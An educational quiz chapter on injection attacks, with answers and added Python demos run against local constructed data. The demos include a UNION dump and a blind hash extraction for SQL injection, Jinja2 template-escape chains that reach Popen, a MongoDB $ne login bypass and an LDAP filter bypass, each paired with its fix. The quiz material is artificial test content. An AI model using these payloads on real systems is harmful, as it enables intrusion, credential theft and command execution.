Chapter 19 Quiz: Injection Attacks
Question 1
What is the root cause of all injection vulnerabilities?
A) Weak encryption algorithms
B) The application fails to maintain a boundary between data and code when interacting with an interpreter
C) Insufficient logging and monitoring
D) Missing authentication on API endpoints
Answer: B) All injection vulnerabilities arise because user-supplied data is treated as part of the interpreter's command language, rather than being kept separate as data.
Question 2
In a UNION-based SQL injection attack, what must be true about the UNION query?
A) It must use the same table as the original query
B) It must have the same number of columns as the original query
C) It must use the same WHERE clause
D) It must return only one row
Answer: B) The UNION query must return the same number of columns as the original SELECT, with compatible types in each position. That is why column-count enumeration is the first step: increase ORDER BY n until the database errors, or grow UNION SELECT NULL,NULL,... until it succeeds (NULL is compatible with every column type). Matching the table, the WHERE clause, or the number of rows is not required.
Question 3
A tester sends ' AND 1=1-- - and gets normal results, then sends ' AND 1=2-- - and gets empty results. What type of injection is possible?
A) Error-based SQL injection
B) UNION-based SQL injection
C) Boolean-based blind SQL injection
D) Time-based blind SQL injection
Answer: C) Boolean-based blind SQL injection. The application returns different responses for true (1=1) vs false (1=2) conditions, allowing data extraction through true/false questions.
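The following Python script, added here as a worked example (it is not part of the quiz), plays both sides of Questions 1 to 3 against an in-memory SQLite database: a search built by string concatenation, the ORDER BY column-count probe, a UNION dump of another table, a boolean oracle driven by the same ' AND 1=1-- - style payloads, and the parameterised version that makes all of them inert. The products and users tables, their rows and the hash value are constructed for the demo.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not from the page).
SAMPLE_SQL = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SQL)
    return conn


def search_vulnerable(conn, term):
    # Question 1's root cause: the user's string is spliced into the SQL text,
    # so the interpreter cannot tell where the data ends and the query resumes.
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # Parameterised query: the value travels separately from the SQL text, so
    # quotes, comments and UNION inside it are never parsed as SQL.
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def enumerate_columns(conn, max_cols=10):
    # Question 2: ORDER BY n errors as soon as n exceeds the column count.
    # The trailing "-- -" comments out the rest of the original statement.
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(conn, f"' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump_users(conn):
    # With two columns known, a two-column UNION SELECT pulls rows from
    # another table into the normal response.
    return search_vulnerable(conn, "' UNION SELECT username, password_hash FROM users-- -")


def boolean_oracle(conn, condition):
    # Question 3: same request shape as ' AND 1=1-- - versus ' AND 1=2-- -.
    # The only signal is whether any rows come back.
    rows = search_vulnerable(conn, f"' AND ({condition})-- -")
    return len(rows) > 0


def blind_extract_hash(conn, username="admin", length=32, alphabet="0123456789abcdef"):
    # Recover a secret one character at a time using only true/false answers.
    subq = f"SELECT password_hash FROM users WHERE username='{username}'"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if boolean_oracle(conn, f"substr(({subq}),{pos},1)='{ch}'"):
                recovered += ch
                break
        else:
            break  # nothing matched: the alphabet or length assumption was wrong
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("columns:", enumerate_columns(db))
    print("union:", union_dump_users(db))
    print("blind:", blind_extract_hash(db))
    print("safe search with payload:", search_safe(db, "' OR 1=1-- -"))
```

The blind loop issues one query per candidate character; a real tool cuts that down with a binary search over the character code (unicode() in SQLite, ASCII() in MySQL), but the oracle it relies on is exactly the two-response difference in Question 3.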
Question 4
Which technique is used when a web application returns identical responses regardless of query truth value, and no error messages are visible?
A) UNION-based injection
B) Error-based injection
C) Time-based blind injection
D) Out-of-band injection
Answer: C) Time-based blind injection wraps a database delay function (MySQL SLEEP(5), PostgreSQL pg_sleep(5), MSSQL WAITFOR DELAY '0:0:5') in a conditional so that the response time, rather than its content, reveals whether the condition was true. Out-of-band injection (D) also works when responses are identical, but it needs the database to make an outbound DNS or HTTP request, which is often blocked.
Question 5
In MongoDB, what does the $ne operator do when injected into a login query?
A) It encrypts the password
B) It matches any value not equal to the specified value
C) It deletes the user record
D) It creates a new database
Answer: B) The $ne (not equal) operator matches any value not equal to its operand. When the request body is parsed as JSON and passed straight into the query, a password of {"$ne": ""} turns the intended equality check into a filter that matches every document whose password is not the empty string, so the lookup succeeds without knowing the password.
Question 6
What is the most secure way to prevent command injection when the application must execute system commands?
A) Use input validation with a denylisting approach
B) Use execFile with arguments as an array and shell=False
C) Escape shell metacharacters in user input
D) Run the command as a low-privilege user
Answer: B) execFile in Node (or subprocess.run with a list of arguments and shell=False in Python) hands the arguments directly to the executable, so no shell ever parses the input and metacharacters such as ; | && and $( ) are ordinary characters. Denylists and escaping (A, C) are bypassable, and a low-privilege account (D) only limits the damage. One caveat remains: the target program still parses its own argv, so a value beginning with "-" can be read as an option; validate arguments (allowlist, or reject a leading dash) and prefer a library call over a subprocess where one exists.
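As an added illustration (not from the page), the Python script below runs one constructed input through a shell=True call and through an argv-list call, so the difference in what reaches the program is visible, and adds the leading-dash check for the argument-injection caveat. It assumes a POSIX environment with /bin/sh and echo available.

```python
import subprocess

# Constructed attacker input (not from the page): a shell would run the
# second command; an argv list delivers the whole string as one argument.
PAYLOAD = "hello; echo INJECTED"


def echo_via_shell(user_input):
    # Vulnerable: the concatenated string is handed to /bin/sh, which
    # honours ; | && $( ) and friends.
    result = subprocess.run("echo " + user_input, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def echo_via_argv(user_input):
    # Hardened: argv list, no shell. Metacharacters are just bytes in argv[1].
    result = subprocess.run(["echo", user_input], shell=False,
                            capture_output=True, text=True)
    return result.stdout


def is_option_like(value):
    # Argument injection survives shell=False: the program itself still
    # parses argv, so "-rf" or "--output=/etc/passwd" may be taken as options.
    return value.startswith("-")


def run_tool(argv_prefix, user_arg):
    # Reject option-like values before they reach the program. For tools that
    # honour the POSIX convention, inserting "--" before positional arguments
    # is a further safeguard (assumption: not every tool supports it).
    if is_option_like(user_arg):
        raise ValueError("refusing option-like argument: %r" % user_arg)
    result = subprocess.run(argv_prefix + [user_arg], shell=False,
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("shell=True :", repr(echo_via_shell(PAYLOAD)))
    print("argv list  :", repr(echo_via_argv(PAYLOAD)))
    print("run_tool   :", repr(run_tool(["echo"], "safe value")))
```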
Question 7
What is second-order SQL injection?
A) Injection that requires two separate SQL queries to execute
B) Injection where malicious input is stored safely but later used unsafely in a different query
C) Injection that targets the second database in a cluster
D) Injection that requires two user accounts to exploit
Answer: B) Second-order injection occurs when input is stored safely (using parameterized queries) but is later retrieved and used in a different query via string concatenation, triggering the injection in a separate code path.
Question 8
Which sqlmap option specifies the level of testing thoroughness?
A) --risk
B) --level
C) --technique
D) --verbose
Answer: B) --level (1-5, default 1) controls how much of the request is tested and how many payloads are tried: level 2 adds cookie values, level 3 adds the User-Agent and Referer headers, and higher levels add more payload and boundary variants. --risk (1-3, default 1) controls how potentially harmful the payloads are; risk 3 enables OR-based tests that can modify data if the injection point is inside an UPDATE or DELETE statement.
Question 9
What does the information_schema database contain in SQL databases?
A) Application business data
B) User passwords in plaintext
C) Metadata about databases, tables, columns, and other database objects
D) Backup copies of deleted data
Answer: C) information_schema is the SQL-standard set of read-only views that describe the database's own structure: schemata, tables, columns, data types, constraints and privileges. MySQL exposes it as a database, PostgreSQL and SQL Server as a schema; Oracle has the ALL_/DBA_ dictionary views instead and SQLite uses sqlite_master. It is the usual first target once a UNION injection works (table names from information_schema.tables, then column names from information_schema.columns), because it tells the attacker what to extract next.
Question 10
A tester discovers a Jinja2 template injection. The payload {{7*7}} returns 49. What is the next step to escalate to remote code execution?
A) Inject {{system('id')}}
B) Navigate the Python class hierarchy via __class__.__mro__ to access os or subprocess modules
C) Inject {{exec('import os; os.system("id")')}}
D) Use {{eval('1+1')}}
Answer: B) A plain Jinja2 environment exposes no Python builtins to templates, so system, exec and eval are undefined names rather than callables. The usual escalation is to start from a literal, climb to object via ''.__class__.__mro__[1], list object.__subclasses__() and pick a gadget such as subprocess.Popen (or reach __builtins__ through a function's __globals__) to obtain command execution. Jinja2's SandboxedEnvironment is designed to stop this traversal by refusing access to underscore-prefixed attributes; if the application uses it, the same payloads fail and a different escape is needed.
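The class-hierarchy walk can be studied outside any template engine, because {{ ''.__class__.__mro__[1].__subclasses__() }} is ordinary Python once Jinja2 evaluates it. The script below is an added example, not from the page and not rendered through Jinja2: it imports subprocess and warnings explicitly to stand in for a web process where those modules are already loaded (an assumption), locates the gadgets by class name rather than by a hard-coded index, and uses them to run a command and to import a module without referring to the subprocess module by name.

```python
import subprocess  # assumed already loaded in the target process (e.g. by the framework)
import warnings    # same assumption; catch_warnings is a classic __builtins__ gadget


def object_subclasses():
    # Exactly what {{ ''.__class__.__mro__[1].__subclasses__() }} evaluates to:
    # str -> object, then every direct subclass of object in this interpreter.
    return "".__class__.__mro__[1].__subclasses__()


def find_gadget(class_name):
    # Search by name: the index of a given class in the list differs between
    # Python versions and loaded modules, so payloads that hard-code [N] break.
    for cls in object_subclasses():
        if cls.__name__ == class_name:
            return cls
    return None


def gadget_path(class_name):
    cls = find_gadget(class_name)
    return None if cls is None else f"{cls.__module__}.{cls.__name__}"


def run_via_popen_gadget(argv):
    # Popen reached purely through the hierarchy; stdout=-1 is the value of
    # subprocess.PIPE, written numerically as a template payload would.
    popen = find_gadget("Popen")
    out, _ = popen(argv, stdout=-1).communicate()
    return out.decode()


def import_via_warnings_gadget(module_name):
    # Alternative chain: a method's __globals__ carries its module's
    # __builtins__ (a dict, or the builtins module depending on how the
    # module was loaded), and __import__ from there yields os, subprocess, etc.
    cw = find_gadget("catch_warnings")
    builtins = cw.__init__.__globals__["__builtins__"]
    importer = builtins["__import__"] if isinstance(builtins, dict) else builtins.__import__
    return importer(module_name)


if __name__ == "__main__":
    print("Popen gadget:", gadget_path("Popen"))
    print(run_via_popen_gadget(["echo", "ssti"]), end="")
    print("imported:", import_via_warnings_gadget("os").__name__)
```

In a real template the same steps are written inline, for example walking {{ ''.__class__.__mro__[1].__subclasses__() }} with a loop over the list and filtering on __name__, so that the payload does not depend on a fixed index.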
Question 11
Why does stacked query injection ('; DROP TABLE users; --) not work against all databases?
A) Not all databases support the DROP TABLE command
B) Not all database drivers allow multiple SQL statements in a single query
C) The semicolon is not a valid SQL separator
D) DROP TABLE requires admin privileges in all databases
Answer: B) Stacking works only if the server accepts multiple statements in one request and the client driver sends them that way. In PHP, the legacy mysql_query() and mysqli_query() send a single statement, while mysqli_multi_query() allows several; MySQL itself supports multi-statement mode only when the client enables it. PostgreSQL and MSSQL drivers usually allow stacked statements, and Python's sqlite3 execute() refuses more than one. The semicolon is a valid separator (C), and DROP TABLE exists everywhere (A); whether it succeeds depends on the application account's privileges, not on stacking.
Question 12
What defense does mongo-sanitize middleware provide against NoSQL injection?
A) It encrypts all MongoDB queries
B) It removes $ operators and dot notation from user-supplied objects
C) It converts MongoDB queries to SQL
D) It adds authentication to all MongoDB connections
Answer: B) mongo-sanitize walks user-supplied objects and strips keys that start with $ (operator injection such as {"$ne": ""} or {"$gt": ""}) and keys containing ., which can otherwise address nested fields. It is a backstop rather than the primary control: the application should also enforce that a credential is a string before it reaches the query, since a sanitised object still is not a password.
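To show Questions 5 and 12 end to end, the added Python example below (not from the page, and using no MongoDB driver) models how find() evaluates an equality versus an operator expression for one field, runs a constructed login request carrying password {"$ne": ""} through a vulnerable handler, then applies a mongo-sanitize-style key filter and a string type check. The user records (stored in plaintext only to keep the demo short) and the request bodies are constructed.

```python
import json

# Constructed users and request bodies for the demonstration (not from the page).
USERS = [{"username": "admin", "password": "s3cret"},
         {"username": "bob", "password": "hunter2"}]

LEGIT_BODY = '{"username": "admin", "password": "s3cret"}'
ATTACK_BODY = '{"username": "admin", "password": {"$ne": ""}}'


def match_value(stored, query_value):
    # Minimal stand-in for how MongoDB evaluates one field of a find() filter:
    # an object whose keys all begin with "$" is an operator expression;
    # anything else (including {}) is an equality comparison.
    if isinstance(query_value, dict) and query_value and all(k.startswith("$") for k in query_value):
        for op, operand in query_value.items():
            if op == "$ne":
                if stored == operand:
                    return False
            elif op == "$gt":
                if not (isinstance(stored, str) and stored > operand):
                    return False
            else:
                raise ValueError("operator not modelled: " + op)
        return True
    return stored == query_value


def find_one(collection, query):
    for doc in collection:
        if all(match_value(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body):
    # The parsed body goes straight into the query, so a JSON object supplied
    # as "password" becomes an operator expression instead of a string.
    data = json.loads(body)
    return find_one(USERS, {"username": data["username"], "password": data["password"]})


def sanitize(value):
    # Same idea as mongo-sanitize: drop keys beginning with "$" or containing
    # ".", recursing into nested objects and arrays.
    if isinstance(value, dict):
        return {k: sanitize(v) for k, v in value.items()
                if not (k.startswith("$") or "." in k)}
    if isinstance(value, list):
        return [sanitize(v) for v in value]
    return value


def login_hardened(body):
    data = sanitize(json.loads(body))
    username, password = data.get("username"), data.get("password")
    # Type enforcement is the primary control: a credential must be a string.
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return find_one(USERS, {"username": username, "password": password})


if __name__ == "__main__":
    print("vulnerable, attack body:", login_vulnerable(ATTACK_BODY))
    print("hardened,   attack body:", login_hardened(ATTACK_BODY))
    print("hardened,   legit body :", login_hardened(LEGIT_BODY))
```

After sanitisation the attack body's password is an empty object; the type check is what turns that into a rejected login rather than an equality test against {}.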
Question 13
During a penetration test, you discover that submitting a single quote in a search field causes an HTTP 500 Internal Server Error. What should you conclude?
A) The application is definitely vulnerable to SQL injection
B) User input may be reaching a SQL interpreter without proper handling, warranting further investigation
C) The web server is misconfigured
D) The application has a bug unrelated to security
Answer: B) A 500 on a single quote suggests the quote reached an interpreter (most likely SQL) and broke its syntax, but a generic error could equally come from XML, LDAP or a template engine, or from an unrelated bug. Confirm before reporting: two single quotes ('') should restore the normal response if SQL string syntax is the cause, and a boolean pair such as ' AND 1=1-- - versus ' AND 1=2-- - shows whether the result can actually be controlled.
Question 14
What is the purpose of sqlmap's --tamper scripts?
A) To modify sqlmap's output format
B) To transform payloads to bypass WAFs and input filters
C) To encrypt the connection between sqlmap and the target
D) To tamper with the target database records
Answer: B) Tamper scripts modify sqlmap's payloads before they are sent. For example, space2comment replaces spaces with inline comments (/**/), and randomcase randomizes keyword casing to bypass signature-based WAFs.
Question 15
Which LDAP injection payload could bypass an authentication filter of the form (&(uid=$username)(userPassword=$password))?
A) admin' OR '1'='1
B) admin)(&)
C) admin; DROP TABLE users
D) admin<script>alert(1)</script>
Answer: B) With username admin)(&) and any password, the filter becomes (&(uid=admin)(&))(userPassword=...)). (&) is the RFC 4526 absolute-true filter, so the first complete filter, (&(uid=admin)(&)), is satisfied by the admin entry, and a lenient parser ignores the trailing (userPassword=...)) text. Strict LDAP libraries reject a filter with trailing characters, so the payload is not universal, but the fault is the same either way: values are interpolated into filter syntax. The fix is to escape ( ) * \ and NUL in values (RFC 4515), or better, to authenticate with an LDAP bind as the user instead of comparing passwords in a search filter. Options A and C are SQL syntax and D is an XSS payload.
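The filter construction and escaping for Question 15, as an added Python example (not from the page): build_filter_vulnerable interpolates raw values, build_filter_safe applies RFC 4515 escaping, and first_complete_filter models the lenient parser that stops at the first balanced filter and ignores the rest. No LDAP server is contacted; the username and password values are constructed.

```python
# RFC 4515 escaping for values placed inside an LDAP search filter.
_LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

# Constructed attacker input for the demo (not from a real engagement).
PAYLOAD_USERNAME = "admin)(&)"
ANY_PASSWORD = "x"


def escape_filter_value(value):
    # Per-character mapping, so a backslash in the input cannot be re-read as
    # the start of an escape sequence we emitted.
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_vulnerable(username, password):
    # Raw interpolation: the username can close its own assertion and add
    # further filter components.
    return f"(&(uid={username})(userPassword={password}))"


def build_filter_safe(username, password):
    # Escaped values stay inside their attribute assertion whatever they contain.
    return f"(&(uid={escape_filter_value(username)})(userPassword={escape_filter_value(password)}))"


def first_complete_filter(filter_string):
    # Model of the lenient parser the bypass relies on: stop where the
    # parentheses first balance and treat anything after that as ignored.
    depth = 0
    for i, ch in enumerate(filter_string):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return filter_string[: i + 1], filter_string[i + 1 :]
    return filter_string, ""


if __name__ == "__main__":
    for builder in (build_filter_vulnerable, build_filter_safe):
        f = builder(PAYLOAD_USERNAME, ANY_PASSWORD)
        evaluated, ignored = first_complete_filter(f)
        print(builder.__name__)
        print("  full filter :", f)
        print("  evaluated   :", evaluated)
        print("  ignored     :", repr(ignored))
```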
Question 16
What is the key difference between injection and XSS attacks?
A) Injection targets the server-side interpreter; XSS targets the client-side browser
B) Injection requires authentication; XSS does not
C) Injection uses SQL; XSS uses HTTP
D) There is no difference; they are the same vulnerability type
Answer: A) Injection attacks target server-side interpreters (SQL database, OS shell, LDAP server) to compromise the server and its data. XSS targets the client-side browser to compromise other users. This is the fundamental distinction between Chapters 19 and 20.
Question 17
In a penetration testing report, how should SQL injection be rated if it allows extraction of the entire user database including password hashes?
A) Low severity (informational)
B) Medium severity
C) High severity
D) Critical severity
Answer: D) Critical severity. SQL injection that dumps the whole user table, hashes included, is a complete loss of data confidentiality, and the same injection point normally allows data modification and often command execution (xp_cmdshell on SQL Server, COPY ... TO PROGRAM on PostgreSQL). A CVSS v3.1 vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H scores 9.8; if the tester can demonstrate only read access, C:H/I:N/A:N scores 7.5 (High), so the report should state which impacts were actually verified rather than assumed.